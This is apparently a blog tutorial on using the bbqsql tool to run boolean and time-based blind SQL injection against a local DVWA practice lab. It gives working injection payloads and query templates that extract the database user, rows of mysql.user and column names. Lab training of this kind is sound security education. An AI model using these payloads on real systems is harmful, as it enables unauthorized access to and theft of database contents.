Disclaimer: This information is provided for educational and professional use only.

What is needed :
bbqsql 1.1
Damn Vulnerable Web App (DVWA) v1.9
OWASP ZAP v2.4.3 / Burp

In this post I will be exploring how to make use of bbqsql by Neohapsis. bbqsql (https://github.com/Neohapsis/bbqsql) is a tools that can be used to conduct normal sql injection and blind sql injection. It first made its appearance at Defcon 20 (https://www.defcon.org/images/defcon-20/dc-20-presentations/Toews-Behrens/DEFCON-20-Toews-Behrens-BBQSQL.pdf).

After conducting a small search on Google I found very limited resources about it. I guess this in turn would naturally lead to the application being used more sparingly.

bbqsql can be found in Kali 2.0. Unfortunately the version that is shipped has a coding error and it is advised to update to the newer version. My tests used version bbqsql 1.1.

Download the new version as follows :
$ pip install --upgrade bbqsql
In my case it was installed in /usr/local/bin/bbqsql you can easily delete the old version that resides in /usr/bin and copy the one from /usr/local/bin/bbqsql :
$ whereis bbqsql
bbqsql: /usr/bin/bbqsql /usr/local/bin/bbqsql
$ cp /usr/local/bin/bbqsql /usr/bin/bbqsql
Check the version you have:
$ bbqsql -V
bbqsql 1.1 
Before starting make a note of the working directory. This is where your configuration is exported to and imported from.
$ pwd
/root/
bbqsql
Once you have the program up and running we need to go to DVWA and test the injection point. I will assume yo have done the hard part and installed DVWA.

Login and downgrade the security difficulty level to low.

We will make use of the SQL injection section in order to see the results to allow for us to judge a true and a false result. Once you have mastered this you can move to the Blind SQLi section. We know from axperiecnce with DVWA that there is an injection point on the page 'SQL Injection'. A simple ' will cause the system to produce an error. And if we enter ' or '0'='0 we get all the users listed. So we will use this injection point to insert a subtraction and comparison statement. A nice break down of what is does is presented in the Defcon 20 pdf.

So lets test this query. Notice that it makes use of the user() function in MySQL (http://dev.mysql.com/doc/refman/5.7/en/information-functions.html). Once you have this working, any query can be used from there on. More MySQL commands can be found in various cheat sheets like http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet.

DVWA low security:

This query provides a number of results ('User ID exists in the database.' on sqli_blind ):
' or ascii(substr(user(),1,1))>0 #
Where as the opposite provides none('User ID is MISSING from the database.' on sqli_blind).
' or ascii(substr(user(),1,1))<0 #
These can be used to create the query template. Based on the examples provided these become:

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

In this case we will use the variation in the content to identify a true or false statement.

Lets have a look at what options we need to set in the first set. Option 1 'Setup HTTP Parameters' has a number of options. Let focus on the ones we will be using.

Fig.1 - Setup HTTP Parameters

Option 2 'cookies' will be used to set the cookies. Make sure to set the right option otherwise you will get the wrong results back. DVWA looks at the cookie value sent to set the security settings before processing the request. I copied mine from ZAP.
'security': 'low', '  PHPSESSID': '0dfr898d44oh55movkfgrtfts7'
 Next set the correct URL with the correct injection point. Remember the program supports a number of injection points, URL, cookie and data (check the slides for examples). Again use ZAP or tcpdump etc. to get the correct URL and arguments. In this case it is :
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#
This is then changed to include the injection point:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1${injection}&Submit=Submit#
Option 5 'proxies' can be useful for debugging by using OWASP ZAP or Burp:
{"http": "127.0.0.1:8080"}
Option 7 'method'
get
Go back using '99' or 'done'
99
Option 2 'Setup BBQSQL Options' is where we setup the programs functionality.

Option 1 'technique' is for setting the technique, we will leave it to binary_search. Remember if you enter a menu you need to set a value. Enter will set a NULL value.

Option 2 'comparison_attr' will be used quite often. Have a look at the different options. For now we will set it to content as we know it changes.
content
Finally, Option 5 'query' will have our custom query. This is the one we created above.


bbqsql will make a number of test attempts and provide you with its results. If these are successful it will print out the results and will ask you if you want to continue.

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

Fig. 2 - Setup BBQSQL Options (time-based) 

Once it is all setup exit 'Setup BBQSQL Options' and get ready to run bbqsql.
99
Due to the fact that the program may crash it is advised that you save your settings.
Once you have exported (i.e,saved) your config you can attempt to run it. This is achieved with Option 5 'Run Exploit' from the main menu.
5
If this works you will start to see the user and the ip address/ hostname:
['root@localhost']

In the images I have provided you will have noticed that the commands are different. I have done a demo of a time based attack and demonstrated it as well. The templates for it can be found below. Passing bbqsql through ZAP/Burp will allow you to better understand how it finds the data.

Fig. 3 - Execution and results of initial tests (time-based attack)

Fig. 4 - Extraction Results and Statistics


Fig. 5 - Final Results and Main Menu

Time-based Blind SQL Injection examples:

A simple function call example (I had to use ',1' as I was getting column errors. I checked this inputting it manually in the browser):

' UNION SELECT IF(ascii(substr(user(),1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template:

' UNION SELECT IF(ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

A more advanced select query (Here it is using offsetting to find the value):

' UNION SELECT IF(ascii(substr(SELECT user FROM mysql.user LIMIT 1 OFFSET 1 ,1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template (I have added ${sleep:50000} but I have noticed it is not very effective as variable) (this 'time' method is faster, compared to 'content' checking):

' UNION SELECT IF(ASCII(SUBSTR(( SELECT user FROM mysql.user LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #

Query Template another example:

' UNION SELECT IF(ASCII(SUBSTR(( SELECT column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #
Try getting the same results with DVWA medium security and above.